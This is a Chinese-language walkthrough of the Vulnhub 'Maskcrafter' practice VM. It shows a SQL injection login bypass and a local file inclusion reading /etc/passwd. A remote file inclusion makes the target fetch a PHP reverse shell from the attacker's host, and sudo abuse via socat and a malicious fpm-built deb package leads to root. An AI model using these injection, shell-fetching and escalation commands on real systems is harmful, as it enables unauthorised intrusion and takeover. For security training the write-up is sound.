Vulnhub之Maskcrafter靶机详细测试过程

这篇具有很好参考价值的文章主要介绍了Vulnhub之Maskcrafter靶机详细测试过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Maskcrafter

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:4c:3f:93      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:1c:48:cc      1      60  PCS Systemtechnik GmbH  

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
Nmap scan report for www.armour.local (192.168.56.254)
Host is up (0.000073s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
|   256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
|_  256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/debug
| http-title: Maskcrafter(TM) Login Page
|_Requested resource was login.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35771/tcp6  mountd
|   100005  1,2,3      35951/udp   mountd
|   100005  1,2,3      47498/udp6  mountd
|   100005  1,2,3      50685/tcp   mountd
|   100021  1,3,4      45195/tcp6  nlockmgr
|   100021  1,3,4      46199/tcp   nlockmgr
|   100021  1,3,4      48207/udp6  nlockmgr
|   100021  1,3,4      53602/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
38041/tcp open  mountd   1-3 (RPC #100005)
45351/tcp open  mountd   1-3 (RPC #100005)
46199/tcp open  nlockmgr 1-4 (RPC #100021)
50685/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ftp 192.168.56.254               
Connected to 192.168.56.254.
220 Welcome to maskcrafter(TM) FTP service.
Name (192.168.56.254:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||28847|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        115          4096 Mar 21  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
drwxr-xr-x    2 112      115          4096 Mar 30  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||63424|)
150 Here comes the directory listing.
drwxr-xr-x    2 112      115          4096 Mar 30  2020 .
drwxr-xr-x    3 0        115          4096 Mar 21  2020 ..
-rw-r--r--    1 0        0             430 Mar 30  2020 NOTES.txt
-rw-r--r--    1 0        0             229 Mar 23  2020 cred.zip
226 Directory send OK.
ftp> get NOTES.txt
local: NOTES.txt remote: NOTES.txt
229 Entering Extended Passive Mode (|||15955|)
150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
100% |********************************************************************************|   430      273.03 KiB/s    00:00 ETA
226 Transfer complete.
430 bytes received in 00:00 (224.31 KiB/s)
ftp> get cred.zip
local: cred.zip remote: cred.zip
229 Entering Extended Passive Mode (|||30982|)
150 Opening BINARY mode data connection for cred.zip (229 bytes).
100% |********************************************************************************|   229      427.59 KiB/s    00:00 ETA
226 Transfer complete.
229 bytes received in 00:00 (197.90 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat NOTES.txt     
Dear Web Administrator,

I've got a few points to make:

1.) Please choose a stronger password for /debug web-directory.
Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.

2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
Basically, we are hoping and praying that no hacker ever finds out about this.

Regards,
Root
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ ls -alh
total 20K
drwxr-xr-x  2 kali kali 4.0K Apr  9 20:00 .
drwxr-xr-x 83 kali kali 4.0K Apr  9 19:54 ..
-rw-r--r--  1 kali kali  229 Mar 23  2020 cred.zip
-rw-r--r--  1 root root 2.7K Apr  9 19:59 nmap_full_scan
-rw-r--r--  1 kali kali  430 Mar 29  2020 NOTES.txt
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip       
Archive:  cred.zip
[cred.zip] cred.txt password:                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ zip2john cred.zip > hashes
ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95

john没有破解出credit.zip密码,而且作者有提示,不需要使用破解方法。

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ showmount -e 192.168.56.254                                
Export list for 192.168.56.254:

目标主机没有NFS共享目录。

Kali Linux访问80端口,为用户登录界面,用admin' or 1=1 -- 即可轻松绕过。

登录成功后,在页面源代码中有注释:

<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
<html>
<head><title>Employee page</title></head>
<body>
	<h3>Welcome admin' or 1=1 -- !</h3>	

	<!-- <p><a href="?page=warning.php">Director's message</a></p> -->
	<a href="logout.php">Logout</a>
</body>
</html>

访问注释中的链接。

访问下面的URL,返回的页面没有变化,但是注释参数page,可能存在本地文件包含漏洞

http://192.168.56.254/index.php?page=warning.php
http://192.168.56.254/index.php?page=../../../../../etc/passwd

访问上述URL得到:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
userx:x:1000:1000:userx:/home/userx:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash

接着测试一下是否存在远程文件包含漏洞:

在Kali Linux启动http

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt

得到返回:

jason,great

说明目标主机存在远程文件包含漏洞。

接下来在Kali Linux准备好php reverse文件,然后访问该文件从而得到shell

http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ sudo nc -nlvp 5555                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 08:15:22 up 17 min,  0 users,  load average: 0.00, 0.00, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@maskcrafter:/$ 

提权

www-data@maskcrafter:/var/www/html$ cat db.php
cat db.php
<?php

$connection = mysqli_connect("localhost", "web", "P@ssw0rdweb", "mydatabase");

if (!$connection)
{
        die("<h4>Connection failed -> " . mysqli_connect_error() . "</h4>");
}

echo "<i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br>";

echo "<pre>";
echo "DB connection ok.";
echo "</pre>";
echo "<hr>";


得到了数据库连接的用户名和密码

www-data@maskcrafter:/home$ mysql -uweb -p 
mysql -uweb -p 
Enter password: P@ssw0rdweb

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 59
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mydatabase         |
| mysql              |
| performance_schema |
| phpmyadmin         |
| sys                |
+--------------------+
6 rows in set (0.01 sec)

mysql> use mydatabase;
use mydatabase;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_mydatabase |
+----------------------+
| creds                |
| login                |
+----------------------+
2 rows in set (0.00 sec)

mysql> select * from creds;
select * from creds;
+----+--------------+-------------+
| id | data_type    | password    |
+----+--------------+-------------+
|  1 | zip password | cred12345!! |
+----+--------------+-------------+
1 row in set (0.00 sec)

mysql> 

这应该是creds.zip的密码

┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ unzip cred.zip
Archive:  cred.zip
[cred.zip] cred.txt password: 
 extracting: cred.txt                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
└─$ cat cred.txt 
userx:thisismypasswordforuserx2020

得到了userx的密码,切换shell到该用户。

userx@maskcrafter:~$ sudo -l
sudo -l
Matching Defaults entries for userx on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User userx may run the following commands on maskcrafter:
    (evdaez) NOPASSWD: /scripts/whatsmyid.sh
userx@maskcrafter:~$ ls -alh /scripts/whatsmyid.sh
ls -alh /scripts/whatsmyid.sh
-rwxr-xr-x 1 userx userx 15 Mar 30  2020 /scripts/whatsmyid.sh
userx@maskcrafter:~$ cat /scripts/whatsmyid.sh
cat /scripts/whatsmyid.sh
#!/bin/bash
id
userx@maskcrafter:~$ echo '/bin/bash' >> /scripts/whatsmyid.sh
echo '/bin/bash' >> /scripts/whatsmyid.sh

userx@maskcrafter:~$ sudo -u evdaez /scripts/whatsmyid.sh
sudo -u evdaez /scripts/whatsmyid.sh
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)
bash: /home/userx/.bashrc: Permission denied
evdaez@maskcrafter:~$ id
id
uid=1002(evdaez) gid=1002(evdaez) groups=1002(evdaez)

成功切换到了用户evdaez

evdaez@maskcrafter:/home/evdaez$ sudo -l
sudo -l
Matching Defaults entries for evdaez on maskcrafter:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User evdaez may run the following commands on maskcrafter:
    (researcherx) NOPASSWD: /usr/bin/socat
evdaez@maskcrafter:/home/evdaez$ sudo -u researcherx /usr/bin/socat stdin exec:/bin/sh
<do -u researcherx /usr/bin/socat stdin exec:/bin/sh
id
id
uid=1001(researcherx) gid=1001(researcherx) groups=1001(researcherx),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

利用socat成功切换到了用户researcherx

cd /tmp
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
Doing `require 'backports'` is deprecated and will not load any backport in the next major release.
Require just the needed backports instead, or 'backports/latest'.
{:timestamp=>"2023-04-10T08:42:18.755150+0000", :message=>"Debian packaging tools generally labels all files in /etc as config files, as mandated by policy, so fpm defaults to this behavior for deb packages. You can disable this default behavior with --deb-no-default-config-files flag", :level=>:warn}
{:timestamp=>"2023-04-10T08:42:18.786663+0000", :message=>"Created package", :path=>"x_1.0_all.deb"}
sudo /usr/bin/dpkg -i x_1.0_all.deb             
(Reading database ... 96141 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls -alh
total 88K
drwx------  9 root root 4.0K Mar 30  2020 .
drwxr-xr-x 28 root root 4.0K Mar 30  2020 ..
-rw-r--r--  1 root root   39 Mar 20  2020 .bash_aliases
lrwxrwxrwx  1 root root    9 Mar 20  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Mar 20  2020 .bashrc
drwx------  2 root root 4.0K Mar 21  2020 .cache
-rw-r--r--  1 root root   22 Mar 20  2020 .gdbinit
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .gem
drwx------  3 root root 4.0K Mar 21  2020 .gnupg
-rw-------  1 root root   38 Mar 20  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Mar 20  2020 .local
drwxr-xr-x  4 root root 4.0K Mar 20  2020 peda
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   75 Mar 23  2020 root.txt
-rw-r--r--  1 root root   75 Mar 20  2020 .selected_editor
drwx------  2 root root 4.0K Mar 20  2020 .ssh
drwxr-xr-x  2 root root 4.0K Mar 21  2020 .vim
-rw-------  1 root root  20K Mar 30  2020 .viminfo
-rw-r--r--  1 root root  215 Mar 21  2020 .wget-hsts
cat root.txt
Congrats on finishing this VM...

Please tweet me your walkthrough @evdaez

至此得到root shell以及root flag.文章来源地址https://www.toymoban.com/news/detail-409344.html

到了这里,关于Vulnhub之Maskcrafter靶机详细测试过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub之Funbox 1靶机详细测试过程

    作者:jason_huawen 名称:Funbox: 1 地址: 利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.164 NMAP扫描结果表明目标主机有4个开放端口:21(FTP)、22(SSH)、80(HTTP)、33060(Mysqlx?) 目标主机不允许匿名访问; FTP服务软件维ProFTDd,但版本未知 Kali Linux上浏览器访问

    2024年02月03日
    浏览(36)
  • Vulnhub之HF 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(43)
  • Vulnhub之Grotesque3靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http) 浏览器访问80端口,返回页面图片中有提示md5? 可能指的是目录字典需要md5加密? 然后去掉每行结果的\\\'-\\\' 然后删除空格: 利用gobuster工具发现了文件 但是

    2023年04月27日
    浏览(37)
  • Vulnhub之Gain Power靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8000(http) nikto工具扫描出目录/secret,访问该目录,将该目录下的图片文件下载到Kali Linux本地进行分析。 但是图片分析没有得到任何有意的结果。 假设用户

    2024年02月02日
    浏览(52)
  • Vulnhub之Inplainsight靶机详细测试过程及经验教训

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 NMAP扫描结果表明目标主机有3个开放端口:21(ftp)、22(ssh)、80(http) 用户:mike, joe 可能有backdoor文件 目标站点是wordpress? Gobuster工具识别出目录/wordpress,访问该目录,发现页面显示不完整,查看页面源代码,可知需

    2023年04月16日
    浏览(43)
  • Vulnhub之Harrison靶机详细测试过程(提权成功)

    作者:jason huawen 名称: SP: harrison 地址: 利用Kali LInux的netdiscover工具识别目标主机的IP地址为192.168.56.125 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、445(samba) enum4linux识别出用户名harrison 没那么容易? 虽然得到了shell,但是这是受限的shell 用-t选项指定不同的shell没能逃脱

    2023年04月23日
    浏览(38)
  • Vulnhub之KB Vuln 3靶机详细测试过程

    作者:jason huawen 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.254 NMAP扫描结果表明目标主机有4个开放端口:22(ssh)、80(http)、139/445(samba) 通过smbclient工具连接目标主机的smb服务,将共享目录中的文件下载到Kali Linux。 enum4linux工具识别出目标主机存在用户名heisenbe

    2023年04月12日
    浏览(44)
  • Vulnhub之Hacker Fest 2019靶机详细测试过程

    作者:jason huawen 名称:Hacker Fest: 2019 地址: 将虚拟机镜像导入到VirtualBox中,并设置网络模式为host-only,然后启动Kali Linux以及目标主机(虚拟机): 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 从NMAP扫描结果表明目标主机有4个开放端口:21(ftp)、22(ssh)、8

    2023年04月22日
    浏览(40)
  • Vulnhub之Gears of War靶机详细测试过程

    利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254 smb服务不允许上传文件 将共享目录的文件下载到Kali Linux到本地 利用enum4linux工具识别目标主机存在marcus用户 john没有破解出来。 SOS.txt文件中的[@%%,],是密码的表达式吗?可用crunch产生字典 这样就根据作者提示的

    2024年02月02日
    浏览(36)
  • Vulnhub之KB Vuln Final靶机详细测试过程

    作者: jason huawen 利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.184 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http),并且nmap扫描结果可知目标主机站点有.git/目录。 Gosuter工具发现了/sites目录 浏览器访问80端口,访问/sites目录,并逐级进入下一层目录,

    2023年04月12日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包